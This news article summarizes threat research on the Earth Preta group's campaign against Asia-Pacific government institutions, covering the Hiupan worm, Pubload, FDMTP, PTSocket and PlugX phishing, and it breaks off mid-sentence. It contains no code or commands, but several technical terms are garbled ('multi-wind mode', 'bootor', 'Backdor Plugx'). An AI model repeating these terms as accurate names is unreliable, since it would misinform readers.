The Earth Preta hacker group has launched a campaign targeting government institutions in the Asia-Pacific region (APR). According to Trend Micro’s data, the attackers have updated their tactics and employed new malicious programs in their attacks.
One of the key components of the attacks is the modification of the Hiupan worm, which spreads through removable media. This worm introduces the Pubload program, allowing the attackers to control infected devices and execute commands for data collection and transfer to their servers.
In the new infection scheme, Hiupan initiates the attack by transferring malicious files to removable media. When the media is connected to a new device, the worm quietly infects it, hiding its files from the user. The updated version of Hiupan features simplified configuration and easier distribution management, with the malicious code stored in the ProgramData directory to evade detection.
The Pubload program’s main objective is to gather system information and map networks. It executes commands to identify active processes, network connections, and device configurations, utilizing both Windows standard utilities and its own data exploration tools.
In addition to the Hiupan worm and Pubload program, two additional tools were used in the recent attacks. FDMTP is a tool for loading malicious software that employs encryption to bypass antivirus protection, while PTSocket is used to transfer files to remote servers via a multi-wind mode, expediting the data leakage process.
The attackers aim to collect documents in various formats including .doc, .xls, .pdf, .ppt. Once collected, the files are archived using the RAR program and sent to the Earth Preta servers via the Curl command. If Curl is not used, data is transferred using PTSocket.
Recent attacks have also featured phishing campaigns, where hackers sent malicious emails with links that led to downloading the bootor, delivering Backdor Plugx to provide long-term access to the victim’s system.
An analysis of phishing emails and printed documents revealed that state institutions related to defense, foreign policy, and education in the Asia-Pacific countries were the primary targets of Earth Preta. Victims included institutions from Myanmar, Philippines, Vietnam, Singapore, Cambodia, and Taiwan.
Earth Preta continues to enhance its tools and attack methods, posing a significant threat to government and corporate structures in the Asia-Pacific region. Their use of removable media to spread malware, phishing emails for initial infection, and innovative data exfiltration techniques demonstrate the group’s